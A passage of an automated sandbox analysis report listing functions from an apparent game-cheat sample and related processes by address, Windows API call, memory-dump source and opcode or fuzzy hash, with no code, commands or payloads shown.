                                  • Instruction ID: 65bb630f694a697b5521dc9d9d8bab1e4abe2922b57499734b33d3d746812e28
                                  • Opcode Fuzzy Hash: b100c35012e8f18de212299a940915c18b73ed51ee8fed23de008e29f675f37e
                                  • Instruction Fuzzy Hash: 5EF0813010036CB6DF258F64AC0DBEA3B99FB20349F184014FD46D4AA1C779C5D69B10
                                  Function 0083084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF,00830A78,?), ref: 00830854
                                  • GetLastError.KERNEL32(?), ref: 00830860
                                    • Part of subcall function 00826E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00826EAF
                                  Strings
                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00830869
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                  • API String ID: 1091760877-2248577382
                                  • Opcode ID: ed652ac822d9c3ba3f815dd1417cf20a3597c75404e06400c2d0841da6305251
                                  • Instruction ID: 71346f3a78553a91e2ae7f57831b2df6bd44842e7d3e81d2861fa5a1c275d21e
                                  • Opcode Fuzzy Hash: ed652ac822d9c3ba3f815dd1417cf20a3597c75404e06400c2d0841da6305251
                                  • Instruction Fuzzy Hash: 75D02E3590863063CA012768AC0ADAF3A04FF52372F610324F238E92F0EE2409A086D6
                                  Function 0082DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,0082D32F,?), ref: 0082DA53
                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0082D32F,?), ref: 0082DA61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: FindHandleModuleResource
                                  • String ID: RTL
                                  • API String ID: 3537982541-834975271
                                  • Opcode ID: f660f400dbb397985444cfb6699d30cbfddece9524f9e5f6b25bb66f830675f8
                                  • Instruction ID: 039611b3b5ee3781606dac79ece790b2d07e0063f46af1efd0827fb5debd9ae5
                                  • Opcode Fuzzy Hash: f660f400dbb397985444cfb6699d30cbfddece9524f9e5f6b25bb66f830675f8
                                  • Instruction Fuzzy Hash: 84C0127128576076DB3017307C0DB836D88BB11B93F05044CB541DA1D0D5E9C9448690

                                  Executed Functions

                                  Function 00007FFD9BAC0D40 Relevance: 2.8, Strings: 2, Instructions: 289COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: H$H
                                  • API String ID: 0-136785262
                                  • Opcode ID: 79e3a932ba67aa9c0abd8ed36946b8dc80d54cf5c4a424f4a72378a00a4a2343
                                  • Instruction ID: 5df8794cda264049115d8a99696a04f4e33ea30d721bbe724a4a600b3d01aa0b
                                  • Opcode Fuzzy Hash: 79e3a932ba67aa9c0abd8ed36946b8dc80d54cf5c4a424f4a72378a00a4a2343
                                  • Instruction Fuzzy Hash: 00B1E271E0960D4FEBB4EB68C864BFDB3A1EF54710F0042BAD01DE71A6DE786A458B44
                                  Function 00007FFD9BAC1758 Relevance: .3, Instructions: 288COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a956f59511bc0ca7d31cff51bf142db76982063d4b99cc4f1a16bba40c488e6f
                                  • Instruction ID: 08904181a1834115c14e664d669aefbafe3f3b46b831472e4f74ce72f66d07a1
                                  • Opcode Fuzzy Hash: a956f59511bc0ca7d31cff51bf142db76982063d4b99cc4f1a16bba40c488e6f
                                  • Instruction Fuzzy Hash: B191E031B0DA4D4FDB58EF5C88645B977E2FFA8300B1541AAE49DC32A6CE60AC028781
                                  Function 00007FFD9BAC1D6D Relevance: .2, Instructions: 188COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 870178128605470a01334cf2f0036805c5bfe746531388ce92cd32e247b7679c
                                  • Instruction ID: c2ddde587d5dc047777010de79d44a1a751794739b9077fb5368b789f16c231a
                                  • Opcode Fuzzy Hash: 870178128605470a01334cf2f0036805c5bfe746531388ce92cd32e247b7679c
                                  • Instruction Fuzzy Hash: 7851C031B18B8D4FDB58EF4888645BA77E2FFE8300B15457EE45AC7296CE34E8028781
                                  Function 00007FFD9BAC35B5 Relevance: .2, Instructions: 166COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4310a9382c49a209943ae32bc3bc97a384b44c10de866b7722f2853cfdec0d2d
                                  • Instruction ID: 258f4460324d41970b191cd597b88527c7ff3f5234b794e3e0648555d5b50dd3
                                  • Opcode Fuzzy Hash: 4310a9382c49a209943ae32bc3bc97a384b44c10de866b7722f2853cfdec0d2d
                                  • Instruction Fuzzy Hash: 0451B031A1994E8FEB98EB68C86ABBD7BE1FF59304F4501B9D00DC72D6DE7469018B40
                                  Function 00007FFD9BAC3205 Relevance: .1, Instructions: 149COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6bc6d6f2bcc9f5ad5f72f55a10a6be1e734ae0a9425fe13629f19c6c5d0f0701
                                  • Instruction ID: e38fa6c7256f4a2febd889de425401c7e0c28176756af8bb254ca422f68ad174
                                  • Opcode Fuzzy Hash: 6bc6d6f2bcc9f5ad5f72f55a10a6be1e734ae0a9425fe13629f19c6c5d0f0701
                                  • Instruction Fuzzy Hash: B5511B70E0A60D8FEB64EB94C4656FDB7F1EF59310F51417AD009E72A2DEB86A44CB40
                                  Function 00007FFD9BAC371F Relevance: .1, Instructions: 128COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 294671529eacc8777b04993dc7bf43d193baaa3356374cc431516c9d7bdb96e7
                                  • Instruction ID: b752d17d92951eda21be84d38fcf24a6c30ea585a0fc734c208a547c70451b10
                                  • Opcode Fuzzy Hash: 294671529eacc8777b04993dc7bf43d193baaa3356374cc431516c9d7bdb96e7
                                  • Instruction Fuzzy Hash: 8A41B672A1990D8FE798DF6CD8653A87BE1EF89324F50427ED059C72DACBF514058B80
                                  Function 00007FFD9BAC32D6 Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ebe6ad2cc062e9c19ade1b5d815223bdaa50cecd0ddd0f7b1e886cf787be8a83
                                  • Instruction ID: 6de72756a40257f34d843ef0291969be9df43301da0565bddbabee4185958170
                                  • Opcode Fuzzy Hash: ebe6ad2cc062e9c19ade1b5d815223bdaa50cecd0ddd0f7b1e886cf787be8a83
                                  • Instruction Fuzzy Hash: 1321F770E0951D8FEB64EB98C465AFC77F1EF58301F55417AD00AE72A1DE786A40CB40
                                  Function 00007FFD9BAC3408 Relevance: .1, Instructions: 76COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d03faea461c3b33ce27b8f5afa590c9f99bbdb349aa426fe3dc1ef9a940c15f
                                  • Instruction ID: 45263f0766f26a283966073545fabea2ec31fe47871b0745e38eb3ebe2c910bd
                                  • Opcode Fuzzy Hash: 2d03faea461c3b33ce27b8f5afa590c9f99bbdb349aa426fe3dc1ef9a940c15f
                                  • Instruction Fuzzy Hash: B8219D3094E68A8FD753ABB488696A97FF0FF07310B0604FAD099CB0B2DA789545CB11
                                  Function 00007FFD9BAC0A01 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c3e6147ab3ec1041aa2fe57ca69c67e8171e23f08f30e57b212f9f79cb01ad74
                                  • Instruction ID: af2c77b17b75a6dfd630bb94e3422a342fb7f227f8841e66d20ce80f12707b59
                                  • Opcode Fuzzy Hash: c3e6147ab3ec1041aa2fe57ca69c67e8171e23f08f30e57b212f9f79cb01ad74
                                  • Instruction Fuzzy Hash: B611C471E0A50E8FE7A4FBA8C8691BD7BE0FF58700F4146B6D41CC71A6EE74A6408740
                                  Function 00007FFD9BAC117D Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6ef9594591c3d9041e22bda806a5284cbafcf38c9a32381d409544516c8a6edb
                                  • Instruction ID: 75fd3c05f71b70f5dcdd19e10ba2c59a721fdaeefeb0ae4c7e3bdbc2dc019989
                                  • Opcode Fuzzy Hash: 6ef9594591c3d9041e22bda806a5284cbafcf38c9a32381d409544516c8a6edb
                                  • Instruction Fuzzy Hash: 7311B670A0A64E4FEBA9FBA484682B97BE0EF65300F0105BFD419C71E2EA696640C740
                                  Function 00007FFD9BAC3535 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7faef53c1fd2e347534008b1dbbcac01183a068656729840b6f3874434bcdad7
                                  • Instruction ID: fd5fce7c8639bb3e40b433f1ab6b6d8a5cf3c9109772a4dcf23e261623e513f2
                                  • Opcode Fuzzy Hash: 7faef53c1fd2e347534008b1dbbcac01183a068656729840b6f3874434bcdad7
                                  • Instruction Fuzzy Hash: F0115E70A1968E8FDB99EFA4C86A6BD7BE0FF19304F0108BED419C71A1DF75A6408740
                                  Function 00007FFD9BAC22A1 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 283a40064c6ef752180e8f4bf4057c02299d25001b4af97b9c487f58b1d6c7c5
                                  • Instruction ID: 1e2b330bcff78428ab7bdc8166a77edf3209fe378d4fa2f32e4a38ce3cfdafc3
                                  • Opcode Fuzzy Hash: 283a40064c6ef752180e8f4bf4057c02299d25001b4af97b9c487f58b1d6c7c5
                                  • Instruction Fuzzy Hash: 35018830A4E64D4FE761FBB884595B97BE0EF56300F4244B6D418C70B6EE78E580C701
                                  Function 00007FFD9BAC05D8 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d37468a8a20fef3b45661cd629a600a8e132f886240f8c87e0e228cc3d002ba
                                  • Instruction ID: 2ee791bb9903bc9385e02dab7890c65641534ea32241fc21618c34f389e0cc6f
                                  • Opcode Fuzzy Hash: 2d37468a8a20fef3b45661cd629a600a8e132f886240f8c87e0e228cc3d002ba
                                  • Instruction Fuzzy Hash: 03018830B0990E8FDB99EF64C4656BA77A1EF68304F21447AE41EC31A5CEB5A690CB40
                                  Function 00007FFD9BAC2F11 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1c8eacef583944c12c5e60b0d76f5226ec9ca79d77fedb11239c82b98964c477
                                  • Instruction ID: b71f55bd48e851e000bbbfb666eb0559173e49083efbe60a51612e53568396ba
                                  • Opcode Fuzzy Hash: 1c8eacef583944c12c5e60b0d76f5226ec9ca79d77fedb11239c82b98964c477
                                  • Instruction Fuzzy Hash: 0901D470E1A74E8FE761FBA484691B97BE0EF19300F4649B6D40CC70B6EE74E2548741
                                  Function 00007FFD9BAC28ED Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: af8e9583e00ae3d5e4e273ba3bf5432646a1df5e53d80ce560ec0b5fb4dc7235
                                  • Instruction ID: a0b6dc48880844231af91ba581fc263a505a3a42d2ee4369d007f038cecbae2e
                                  • Opcode Fuzzy Hash: af8e9583e00ae3d5e4e273ba3bf5432646a1df5e53d80ce560ec0b5fb4dc7235
                                  • Instruction Fuzzy Hash: A2018F31E0A74E4FE765FBA488A86B97BE0EF19300F4245B6D408C70B6EE74E640C741
                                  Function 00007FFD9BAC2F89 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52a2757677378603f257dca9d3ff7e8303aea08e2b36ab5c1253732007f4a56d
                                  • Instruction ID: cf09d0ef871e6185d1f41adc057baefe38638f2f37ba2f5987e845532f211055
                                  • Opcode Fuzzy Hash: 52a2757677378603f257dca9d3ff7e8303aea08e2b36ab5c1253732007f4a56d
                                  • Instruction Fuzzy Hash: 3601B170A0E74E4FE762BBB488695B97BE0EF05300F0608F7C408CB0A6DA68A6588741
                                  Function 00007FFD9BAC0610 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbebd05ce03adebbd82239c76837e07f53972c0a959ab882a6652e5e7b456df3
                                  • Instruction ID: 782e7cbc47d44e69abca47fede5589545a25d7905a167f5ccd5893d8711e65c6
                                  • Opcode Fuzzy Hash: cbebd05ce03adebbd82239c76837e07f53972c0a959ab882a6652e5e7b456df3
                                  • Instruction Fuzzy Hash: A9018130A19A0E8AEB58FBA4C4686B973E0FF18305F1148BED41EC31E5DF75A690CB00
                                  Function 00007FFD9BAC0608 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dad3509242cc8c82e2ac16abe321a2a7794d4584b33731eeb1a847ab8a185a3d
                                  • Instruction ID: e1fc9442088028e1abf2cebc47ed209fec23db7e8a5b5988321aa571994808aa
                                  • Opcode Fuzzy Hash: dad3509242cc8c82e2ac16abe321a2a7794d4584b33731eeb1a847ab8a185a3d
                                  • Instruction Fuzzy Hash: 41016D30A1960E8BEB68FFA4C4696BD73A0FF18305F1148BED41EC21E5DE75A250CB00
                                  Function 00007FFD9BAC1CED Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0ac38c3beab2bbd512ab193219e00a5d9371a34ea14564843df6322b3bb92d4
                                  • Instruction ID: 9d0af0433644cf404fc41c0591bfdda080b2619e39d627eef7045eb1076d70d9
                                  • Opcode Fuzzy Hash: d0ac38c3beab2bbd512ab193219e00a5d9371a34ea14564843df6322b3bb92d4
                                  • Instruction Fuzzy Hash: 4701D630A0A68D8FDB95AF5484652BA7BA0EF65304F41007AE80CC31A2DAB99550CB40
                                  Function 00007FFD9BAC05D0 Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0c3c4880c888b06573c58394154ffdda8543fc1e42c11a1ff104200712f11309
                                  • Instruction ID: 68444cd030cc655d74e43b8967ef9264816d0c8ed38fce35dc394b441c7e4444
                                  • Opcode Fuzzy Hash: 0c3c4880c888b06573c58394154ffdda8543fc1e42c11a1ff104200712f11309
                                  • Instruction Fuzzy Hash: 75F0FC30B0A54E8FDB95FF6484255FA7790EF25309F11047AE81DC30D1CE75A550CB40
                                  Function 00007FFD9BAC1190 Relevance: .0, Instructions: 38COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25c5dc958c5cb6b9d7d050d96c0395b1330f17ead0d941a2252321d71ecce707
                                  • Instruction ID: 25c0755983b5da1309ffb1c0eb09953c2a8bb740b35a8011db2f9a0441a7d2d1
                                  • Opcode Fuzzy Hash: 25c5dc958c5cb6b9d7d050d96c0395b1330f17ead0d941a2252321d71ecce707
                                  • Instruction Fuzzy Hash: 08F0C870F1A65F8AFBA5BFA888682B976E4EF65305F00153FD41DC30E1EEB852548640
                                  Function 00007FFD9BAC2809 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4f76c824e54b35570aa83cb43650227b2b5096736fae801071de6259f258432e
                                  • Instruction ID: 9c4334f6ac4eb380b992fc1fddde2ebb894b52c720a70147abbe6dd330a03a12
                                  • Opcode Fuzzy Hash: 4f76c824e54b35570aa83cb43650227b2b5096736fae801071de6259f258432e
                                  • Instruction Fuzzy Hash: 09F0AF3190E38D8FDB69ABA088751B93B60AF56200F4644BAE408C60E2DAA89548C741
                                  Function 00007FFD9BAC287D Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d07905d7eedb449403a069172a8e6ca1c7f3610266fff6c8bbd710f1a375f9fa
                                  • Instruction ID: 1a9458d97373516734a4a8fdc8ad36f010a558b2f0751ac1342bb12073f1fe95
                                  • Opcode Fuzzy Hash: d07905d7eedb449403a069172a8e6ca1c7f3610266fff6c8bbd710f1a375f9fa
                                  • Instruction Fuzzy Hash: EDF0243090E78E8FEB68AFA088242F93BA0FF15300F4100BEE418C60E1DB78E5408700
                                  Function 00007FFD9BAC5C06 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1974040724.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_7ffd9bac0000_browserwinsvc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8611139f153c53c4eb751b61a7e00d8b8c24fac7b03b308f9bb26b0e778ac99
                                  • Instruction ID: 074a76dfe99a1a0f456058fb6177595cf7522205a5fb6703ae8b03709bd65cba
                                  • Opcode Fuzzy Hash: d8611139f153c53c4eb751b61a7e00d8b8c24fac7b03b308f9bb26b0e778ac99
                                  • Instruction Fuzzy Hash: 49F074B0D0951E8EDBA4EB588855BE9B7B1FB59305F5101EEC50DE72A1DE705A80CF04

                                  Executed Functions

                                  Function 00007FFD9BAB0D40 Relevance: .3, Instructions: 289COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2baa973d0c99f1c83144e2317120adaf33b1952d897242c7f6c8674fdaaaab00
                                  • Instruction ID: ed61cb33dc746375cac9b1f55541cb469fb7bd3691c7889a4d1e6665e52332d3
                                  • Opcode Fuzzy Hash: 2baa973d0c99f1c83144e2317120adaf33b1952d897242c7f6c8674fdaaaab00
                                  • Instruction Fuzzy Hash: 86A1D171E0962D4FEBB4DB648865BECB3A1EF54710F0042BAD02DE71E2DE786A458F44
                                  Function 00007FFD9BAB1758 Relevance: .3, Instructions: 288COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 00c7fb8005ebd6f77255bc052da15c37758c1388cd7c3fc57fdffef6d395c446
                                  • Instruction ID: 37a08e119387ae90150e05d0c59b024ddd6d237b26788f826ededae48d666fc0
                                  • Opcode Fuzzy Hash: 00c7fb8005ebd6f77255bc052da15c37758c1388cd7c3fc57fdffef6d395c446
                                  • Instruction Fuzzy Hash: 4291D131B2DA594FDB58DF5C88656B977E2FFA8300F15417AE46DC3296CE60AD02CB80
                                  Function 00007FFD9BAB1D6D Relevance: .2, Instructions: 188COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dc5ab3941bbeaaa371f3ced33cd8d083644e057ff8286120fc276339d3d43a48
                                  • Instruction ID: 3bb12be6a0b00b4749f176f7c9ea9ffdfe2cb350f8301fca4c2db2fa5be77c7b
                                  • Opcode Fuzzy Hash: dc5ab3941bbeaaa371f3ced33cd8d083644e057ff8286120fc276339d3d43a48
